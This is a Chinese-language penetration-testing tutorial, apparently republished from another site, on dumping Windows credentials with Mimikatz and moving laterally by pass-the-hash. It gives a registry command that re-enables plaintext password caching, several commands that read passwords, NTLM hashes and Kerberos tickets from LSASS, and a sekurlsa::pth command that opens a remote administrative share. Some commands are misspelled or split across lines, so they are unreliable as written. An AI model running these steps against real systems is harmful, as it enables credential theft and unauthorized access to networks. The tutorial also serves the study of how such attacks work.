内网横向移动|哈希传递PTH|mimikatz使用

Mimikatz下载地址:链接：https://pan.百度.com/s/1k7i_Z_iGNbTgVeQiBKWszA   提取码：lyq1 
 

工具简介:

Mimikatz是法国人benjamin开发的一款强大的轻量级调式工具,本意是用来个人测试,但由于其功能强大,能够直接读取Windows-XP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具

注意:

当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文

reg add HKLM/SYSTEM/CurrentControlSet/Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Mimikatz命令

1.  
   cls:清屏
2.  
   standard:标准模块
3.  
   crypto:加密相关模块
4.  
   sekurlsa:与证书相关的模块
5.  
   kerberos:kerberos模块
6.  
   privilege:提权相关模块
7.  
   process:进程相关模块
8.  
   serivce:服务相关模块
9.  
   lsadump:LsaDump模块
10.  
    ts:终端服务器模块
11.  
    event:事件模块
12.  
    misc:杂项模块
13.  
    token:令牌操作模块
14.  
    vault:windows证书模块
15.  
    minesweeper:Mine Sweeper模块
16.  
    dpapi:DPAPI模块(通过API或RAW访问)[数据保护应用程序编程接口]
17.  
    busylight:BusyLight Module
18.  
    sysenv:系统环境值模块
19.  
    sid:安全标识符模块
20.  
    iis:IIS XML配置模块
21.  
    rpc:mimikatz的RPC控制
22.  
    sr98:用于SR98设备和T5577目标的RF模块
23.  
    rdm:RDM(830AL)器件的射频模块
24.  
    acr:ACR模块
25.  
    version:查看版本
26.  
    exit:退出

**提升权限 命令: privilegs::debug ** (**可以更改为任意用户)

mimikatz有许多功能都需要管理员权限,如果不是管理员权限不能debug

 抓取明文密码

        在windows2012以上的系统不能直接获取明文密码了,但是可以搭配procdump mimikatz获取密码

1.  
   # log
2.  
   # privilege::debug
3.  
   # sekurlsa::logonpasswords

 已经爆出来了密码同时NTLM和LM值我们都可以查看

sekurlsa::logonpasswords解析

 msv:这项是账户对于的密码的各种加密协议的密文,可以看到有LM,NTLM和SHA1加密的密文

tspkg,wdigest,kerberos:这个就是账户对于明文密码了,有的时候这三个对于的也不是全部都一样,需要看服务器是什么角色

SSP:是最新登录到其他RDP终端的账户和密码(RDP是3389远程连接)

Sekurlsa模块

1.  
   sekurlsa::logonpasswords//显示登录的密码
2.  
    
3.  
   sekurlsa::msv//抓取用户NTLM哈希
4.  
    
5.  
   sekurlsa::minidump lsass.dmp
6.  
   sekurlsa::logonpasswords full//加载dmp文件,并导出其中的明文密码
7.  
    
8.  
   sekurlsa::tickets /export //导出lsass.exe进程中的所有的票据

PTH哈希传递

        pass-the-hash在内网渗透是一种很经典的攻击方法,原理就是攻击者可以通过LM hash和NTLM Hash访问远程主机或者服务,而不用提供明文密码

        pass the hash原理:

                在windows系统中,通常会使用NTLM身份认证

                NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogomUser)

                hash分为LM hash和NT hash,如果密码长度大于15,那么无法生成LM hash,从windows Vista和Windows Server 2008 开始,微软默认禁用LM hash

                如果攻击者获取了hash,就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程)

        这类攻击适用于

                域/工作组环境

                可以获得hash,但是条件不允许对hash爆破

                内网中存在和当前机器相同密码

        微软也对pth打过补丁,然而在测试中发现,打了补丁后,常规的PTH已经无法成功,但是默认的Administrator账号例外,利用这个账号依然可以进行PTH远程ipc连接

        如果禁用了NTLM认证,PsExec无法利用获得的NTLM hash进行远程连接,但是使用mimikatz还是可以成功攻击,从windows到windows横向pth这一类攻击方法比较广泛               

测试

        mimikatz的pth功能需要本地管理员权限,这是由他的实现机制决定的,需要先获得最高权限几次呢lsass.exe信息

lsass.exe

        lsass.exe是一个系统进程,由于微软windows系统的安全机制,它用于本地安全和登录策略,注意:lsass.exe也有可能是Windang.worm,irc.ratsou.b、Webus.B、MyDoom.L、Randex.AR、Nimos.worm创建的，病毒通过软盘、群发邮件和P2P文件共享进行传播

        使用mimikatz获取hash

1.  
   privilege::debug
2.  
   sekurlsa::logonpasswords

 得到hash后 使用mimikatz输入

1.  
   sekurlsa::pth /user:administrator /d
2.  
   omain:IP地址 /ntlm:2cefb09dda6d6f9becfa3c0f56c3dad7

弹出一个cmd窗口 

执行 dir \\192.168.52.141\c$ 执行成功

总结

这篇好文章是转载于：学新通技术网